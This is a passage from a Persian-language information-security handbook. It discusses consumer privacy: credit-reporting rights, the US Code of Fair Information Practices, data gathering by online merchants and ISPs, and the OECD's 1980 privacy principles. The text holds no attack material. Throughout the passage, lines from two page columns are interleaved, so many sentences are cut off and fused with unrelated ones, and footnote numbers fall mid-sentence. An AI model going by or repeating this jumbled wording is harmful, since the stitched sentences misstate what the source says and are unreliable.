ﺍﻋﺘﺒﺎﺭﻱ ﻫﺮ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﺗﻮﺳﻂ ﺧﻮﺩ ﺍﻭ ،ﺣﻖ ﺍﻃـﻼﻉ ﺍﺯ ﺍﻳﻨﻜـﻪ
ﭼﻪ ﻛﺴﺎﻧﻲ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻭﻱ ﺭﺍ ﻣـﻲﺑﻴﻨﻨـﺪ ،ﺣـﻖ ﺍﻟـﺰﺍﻡ
ﺭﻭﺍﺑﻂ ﺗﺠﺎﺭﺕ ﻭ ﻣﺸﺘﺮﻱ ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﻬﻴﻪﻛﻨﻨﺪﺓ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻪ ﺗﺤﻘﻴﻖ ﺩﺭ ﻣﻮﺭﺩ ﺍﺷـﺘﺒﺎﻫﺎﺕ
ﻛﺸﻒﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ،ﻭ ﺣﻖ ﺍﻟـﺰﺍﻡ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﺑﺎﺯﺭﮔﺎﻧﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺑﺪﺳـﺖ
ﺍﺿﺎﻓﻪﻛﺮﺩﻥ ﻳﻚ ﺍﻇﻬﺎﺭﻳﻪ ﺍﺯ ﻃـﺮﻑ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣﻲﺁﻭﺭﻧﺪ .ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺵ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣـﻲﺩﺍﻧـﺪ ﺷـﻤﺎ ﺩﺭﺣـﺎﻝ
ﻣــﻮﺭﺩ ﻣﻨﺎﻗــﺸﻪ .ﺩﺭ ﺳــﺎﻝ - ۱۹۷۳ﺩﺭ ﺩﻭﺭﻩﺍﻱ ﻛــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺑﺮﺭﺳﻲ ﻛﺪﺍﻡ ﻣﺤﺼﻮﻝ ﻫـﺴﺘﻴﺪ؛ ﻛـﺪﺍﻡ ﻣﺤـﺼﻮﻝ ﺭﺍ ﺑـﻪ ﻛـﺎﺭﺕ
ﺷﺨﺼﻲ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ -ﺑـﺮﺍﻱ ﺧﺮﻳﺪ ﺧﻮﺩ ﻣﻲﺍﻓﺰﺍﻳﻴﺪ ﺍﻣﺎ ﭘﺲ ﺍﺯ ﻣﺪﺗﻲ ﺣﺬﻑ ﻣﻲﻛﻨﻴﺪ؛ ﻭ ﻛـﺪﺍﻡ
ﺍﺣﻘﺎﻕ ﺣﻘﻮﻕ ﻣﺼﺮﻑ ﻛﻨﻨﺪﻩ ،ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﺤــﺼﻮﻝ ﺭﺍ ﻧﻬﺎﻳﺘـﹰﺎ ﺑــﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻣــﻲﺧﺮﻳــﺪ .ﺑﺎﺯﺭﮔﺎﻧــﺎﻥ
ﺑﺎﺯﺍﺭ ١١٧ﺍﺑﻼﻍ ﺷﺪ. ﺍﻳﻨﺘﺮﻧﺘﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺩﺍﻧﻨﺪ ﻫﻨﮕﺎﻡ ﺧﺮﻳﺪ ﺩﺭ ﺧﺎﻧﻪ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ
ﺳ ﹺﺮ ﻛﺎﺭ ،ﻭ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺑﺎﻗﻴﻤﺎﻧـﺪﺓ ﺍﻋﺘﺒـﺎﺭ ﻛـﺎﺭﺕ
١١٨
ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ ﺧﺮﻳﺪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻄﻠـﻊ ﺷـﻮﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﺮﺧﻼﻑ ﺩﻧﻴـﺎﻱ
ﻏﻴﺮﺍﻳﻨﺘﺮﻧﺘﻲ ،ﻳﻚ ﺑﺎﺯﺭﮔﺎﻥ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺳﺎﺑﻘﺔ ﺧﺮﻳـﺪ
ﺁﻳﻴﻦﻧﺎﻣﺔ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﺍﺭ ﺑﺮ ﭘﻨﺞ ﺍﺻﻞ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ:
ﻭ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺷﻤﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭ ﺑـﺎ
ﻖ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳـﺪ
ﻱ ﺳﻮﺍﺑ ﹺ
ﻫﻴﭻ ﺳﻴﺴﺘ ﹺﻢ ﻧﮕﻬﺪﺍﺭ ﹺ • ﺑﺮﻗﺮﺍﺭﻱ ﭼﻨﻴﻦ ﺭﻭﺍﺑﻄﻲ ﻣﻴﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻃﻴﻒ ﻭﺳﻴﻌﻲ ﺍﺯ
ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﻣﺸﺘﺮﻳﺎﻥ ،ﺑﻪ ﻳﻜﺴﺮﻱ ﺍﻟﮕﻮﻫﺎﻱ ﺍﺭﺯﺷﻤﻨﺪ ﺭﻓﺘﺎﺭﻱ ﭘﻲ ﺑﺒﺮﺩ.
ISPﻫــﺎ ﻗﺎﺩﺭﻧــﺪ ﺍﺯ ﺍﻳــﻦ ﻫــﻢ ﺑﻴــﺸﺘﺮ ﺩﺭ ﻣــﻮﺭﺩ ﻣــﺸﺘﺮﻱ ﺧــﻮﺩ
ﺍﻃﻼﻋﺎﺕ ﻛﺴﺐ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺮﺁﻧﭽﻪ ﻛﺎﺭﺑ ﹺﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣـﻲﺑﻴﻨـﺪ
116 Fair Credit Reporting Act
117 Code of Fair Information Practices
۱۱۸ﻣﻨﺒﻊ :ﻭﺯﺍﺭﺕ ﺑﻬﺪﺍﺷﺖ ،ﺁﻣﻮﺯﺵ ﻭ ﺭﻓﺎﻩ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ 115 Cyberspace
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٧٦
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺍﻃـﻼﻉ •
ﭘﻴﺪﺍ ﻛﻨﺪ ﻛﻪ ﭼﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﻣﻲﺷﻮﺩ
ﻫﻤﻜﺎﺭﻱ ﻭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ
ﻭ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜـﺎﺭﻱ ﻭ ﺗﻮﺳـﻌﻪ ﺍﻗﺘـﺼﺎﺩﻱ ) ١٢١(OECDﺩﺭ ﺳـﺎﻝ
۱۹۸۰ﻳﻚ ﺭﺷﺘﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺖ ﻭ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ •
ﺁﻧﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﺑﻜﺎﺭ ﺭﻓﺘﻦ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺩﺭ ﺍﻫـﺪﺍﻓﻲ ﻏﻴـﺮ ﺍﺯ
ﺿﻮﺍﺑﻂ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻـﻨﻌﺘﻲ ﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﻼﻡ ﺷﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ.
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﻄﻮﺭ ﺧـﺎﺹ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺑﺮﺍﻱ ﺧﻮﺩ ﻓﺮﺩ ﺑﺎﻳﺪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﺻـﻼﺡ ﺍﻃﻼﻋـﺎﺗﻲ ﺍﺯ ﺍﻭ •
ﺑﻮﺩﻧﺪ ﺗﺎ ﺑﻪ ﻣـﺸﻜﻼﺕ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﺟﺮﻳـﺎﻥ ﻓﺮﺍﻣـﺮﺯﻱ ﺩﺍﺩﻩﻫـﺎ - ﻛﻪ ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﻭﻱ ﻣﻲﺷﻮﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺣﺮﻛﺖ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺭ
ﻫﺮ ﺳﺎﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺭﺍ •
ﺁﻥ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺑﻪ ﻛـﺸﻮﺭﻱ ﺩﻳﮕـﺮ ﻛـﻪ
ﺗﻬﻴﻪ ،ﻧﮕﻬﺪﺍﺭﻱ ،ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﭘﺨﺶ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ
ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨـﺼﻲ ﺩﺭ ﺁﻥ ﺍﺯ ﺣﻔﺎﻇـﺖ ﻛﻤﺘـﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ -
ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺩﻩ ﻫﺎ ﺩﺭ
ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ OECDﺩﺭ ﻣــﻮﺭﺩ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺮﻳﻢ
ﻛﺎﺭﺑﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺗـﻀﻤﻴﻦ ﻧﻤﺎﻳـﺪ ﻭ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ
ﺧﺼﻮﺻﻲ ﻭ ﺟﺮﻳﺎﻥ ﻓﺮﺍﻣﺮﺯﻱ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻫـﺸﺖ ﺍﺻـﻞ ﺗـﺸﻜﻴﻞ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ.
ﺷﺪﻩ ﺍﺳﺖ:
ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻪ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ
١٢٢
ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺟﻤﻊﺁﻭﺭﻱ ﺷﺨﺼﻲ ﺭﺍ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻣﻲﻛـﺮﺩ ﺍﺩﺍﻣـﻪ ﺩﺍﺩ .ﺑـﺎ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ،
ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻭﺟﻮﺩ ﻦ
ﺳﻮﺍﺑﻖ ﺑﺎﻧﻜﻲ ،ﺳﻮﺍﺑﻖ ﺗﻠﻔﻦ ،ﺳﻮﺍﺑﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﺳﻮﺍﺑﻖ ﻣـﺸﺘﺮﻛﻴ ﹺ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻫﺮ ﺩﺍﺩﺓ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻛﺎﺑﻠﻲ ،ﺳﻮﺍﺑﻖ ﺑﻬﺪﺍﺷـﺘﻲ ،ﺳـﻮﺍﺑﻖ ﺗﺤـﺼﻴﻠﻲ ﻭ ﺣﺘـﻲ
ﻗــﺎﻧﻮﻧﻲ ﻭ ﻣﻨــﺼﻔﺎﻧﻪ ،ﺩﺭ ﺷــﺮﺍﻳﻂ ﺩﺭﺳــﺖ ،ﻭ ﺑــﺎ ﺩﺍﻧــﺶ ﻭ ﺳﻮﺍﺑﻖ ﺍﺟﺎﺭﺓ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳـﺪﺋﻮﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺗﺤـﺖ ﭘﻮﺷـﺶ
ﺭﺿﺎﻳﺖ ﻓﺮﺩﻱ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺍﻭ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﺩ ﺑﺪﺳﺖ ﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭﺁﻣﺪﻧﺪ .ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﻫـﺮ ﺟـﺰﺀﻗﺎﻧﻮﻥ ﻛﻨﮕﺮﻩﺍ ﹺ
ﺑﻴﺎﻳﺪ. ﻗﺎﻧﻮﻥ ﺣﻔﺎﻇﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺍﻳﺠـﺎﺩ ﻣـﻲﻛﻨـﺪ ﻭ ﺗﻮﺳـﻂ ﺑﺨـﺶ
١٢٣
ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻧﻴﺮﻭﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺟﺮﺍﺋﻢ ﻣﺜـﻞ
ﺍﺻﻞ ﻛﻴﻔﻴﺖ ﺩﺍﺩﻩﻫﺎ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣﺔ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣـﺸﺘﺮﻛﻴﻦ ﺗﻠﻔـﻦ ﻭ
ﻲ ﺟﻤﻊﺁﻭﺭﻱﺷﺪﻩ ﺑﺎﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﻫـﺪﻓﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼ ﹺ
ﺩﻭﺭﻧﮕﺎﺭ ١١٩ﻣﻲﮔﻨﺠﺪ ،ﺑﺪﻭﻥ ﺷـﻜﺎﻳﺖ ﺷـﺎﻛﻲ ﺧـﺼﻮﺻﻲ ﻗﺎﺑـﻞ
ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﻋﻼﻡ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﻮﺯﻩ-
ﭘﻴﮕﺮﺩ ﻧﺒﻮﺩﻧﺪ .ﺍﻣﺎ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣﺴﺎﺋﻞ ﻃﻮﺭ ﺩﻳﮕـﺮﻱ ﺑـﻮﺩ .ﺑـﺮ ﭘﺎﻳـﺔ
ﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﻫﺪﻑ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﻗﻴـﻖ،
ﺗﺠﺮﺑــﺔ ﺟﻨــﮓ ﺩﻭﻡ ﺟﻬــﺎﻧﻲ ﻛــﻪ ﺩﺭ ﺁﻥ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ
ﻛﺎﻣﻞ ،ﻭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ.
ﺷﺨﺼﻲ ﺗﻮﺳﻂ ﻧﺎﺯﻳﻬﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓـﺖ ،ﺑﻴـﺸﺘﺮ
١٢٤ ﺩﻭﻝ ﺍﺭﻭﭘﺎﻳﻲ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻧﺪ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ
ﺍﺻﻞ ﺗﻌﺮﻳﻒ ﻫﺪﻑ
ﻛﺮﺩﻥ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﻫﺪﻑ ﺍﺯ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺑﺎﻳـﺪ ﺩﺭ ﻫﻤـﺎﻥ
ﺍﺭﻭﭘﺎﻳﻴﺎﻥ ﺍﻳﺪﻩﻫﺎﻱ ﻣﻄﺮﺡ ﺩﺭ ﺁﻳﻴﻦﻧﺎﻣـﺔ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﻟﺤﻈﺔ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﻧﻪ ﺩﻳﺮﺗﺮ ﺍﺯ ﺁﻥ ﻣﺸﺨﺺ ﺑﺎﺷﺪ.
ﺑﺎﺯﺍﺭ ﺭﺍ ﺑﻪ ﻳﻚ ﻧﻈﺎ ﹺﻡ ﻛﻠﻲ ﻣﻮﺳﻮﻡ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ١٢٠ﺗﻌﻤـﻴﻢ
ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺟﻤﻊﺁﻭﺭﻱﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﻪ
ﺩﺍﺩﻧﺪ.
ﻫﻤﺎﻥ ﺍﻫﺪﺍﻑ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ؛ ﻭ ﺍﮔـﺮ ﻫـﺪﻓﻬﺎﻱ ﺑﻌـﺪﻱ ﺑـﺎ
ﺍﻫﺪﺍﻑ ﺍﻭﻟﻴﻪ ﺳﺎﺯﮔﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺍﻫـﺪﺍﻑ ﺭﺍ
oﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺑﺤﺚ ﻛﻨﺪ ﻭ ﺻﺮﺍﺣﺘﹰﺎ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻭ ﻧﻴـﺰ ﺍﻋـﻼﻡ ﺭﺿـﺎﻳﺖ ﻓـﺮﺩ ﺑـﺮﺍﻱ
ﺍﮔﺮ ﺩﺭ ﺑﺤﺚ ﻣﻮﻓﻖ ﺷـﺪ ﻗـﺎﺩﺭ ﺑﺎﺷـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻭﻱ ﺩﺭ ﺍﻫﺪﺍﻑ ﺟﺪﻳﺪ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
ﺣﺬﻑ ،ﺍﺻﻼﺡ ﻭ ﻳﺎ ﺗﻜﻤﻴﻞ ﻧﻤﺎﻳﺪ.
١٢٥
ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ
١٢٩
ﺍﺻﻞ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳﺪ ﺍﻓﺸﺎ ﺷـﻮﻧﺪ ،ﺩﺭ ﺩﺳـﺘﺮﺱ ﻋﻤـﻮﻡ
ﻫﺮ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺩﺭ ﻗﺒـﺎﻝ ﻋﻤـﻞ ﺑـﻪ ﺍﺻـﻮﻝ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ،ﻳﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﻏﻴﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﺍﻋﻼﻡ ﺷـﺪﻩ
ﺫﻛﺮﺷﺪﺓ ﺑﺎﻻ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﺪ. -ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﺻﻮﻝ ﻗﺒﻞ ﮔﻔﺘـﻪ ﺷـﺪ -ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ،
ﻣﮕﺮ:
ﺩﺭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ OECDﺍﺟﺒﺎﺭ ﻗﺎﻧﻮﻥ ﺑﻪ ﭼﺸﻢ ﻧﻤﻲﺧـﻮﺭﺩ ،ﺍﻣـﺎ
ﺩﺭ ﻋﻮﺽ ﻫﻨﮕﺎﻡ ﺑﺮﺭﺳﻲ ﻗﻮﺍﻧﻴﻦ ﻫﺮﻳﻚ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ،ﺍﺯ ﻱ ﻣﺎﻟﻚ ﺍﻃﻼﻋﺎﺕ؛ ﻳﺎ
oﺑﺎ ﺭﺿﺎﻳﺖ ﻓﺮﺩ ﹺ
oﺑﺎ ﻳﻚ ﻣﺠﻮﺯ ﻗﺎﻧﻮﻧﻲ.
ﺍﻳﻦ ﻫﺸﺖ ﺍﺻﻞ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
١٢٦
ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺳـﺎﺩﻩ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﺻﻞ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ -ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﺩﺭ
ﻣﻮﺭﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﻭﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ - ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺗﻲ ﺍﺯ ﻗﺒﻴﻞ ﻧﺎﻗﺺ ﺷﺪﻥ ،ﺩﺳﺘﺮﺳﻲ ،ﺗﺨﺮﻳﺐ،
ﺑﺨﺶ ﺳﻮﻡ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ. ﺗﻐﻴﻴﺮ ،ﺍﻓﺸﺎ ،ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺮﺍﻗﺒﺖ ﺷﻮﻧﺪ.
١٢٧
ﺍﺻﻞ ﺑﺎﺯ ﺑﻮﺩﻥ
ﺑﺎﻳﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺩﺭﺑﺎﺭﺓ ﺷـﻔﺎﻑ ﺑـﻮﺩﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ
ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎ ﻧﮕﺎﻩ ﺧﺎﺹ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ
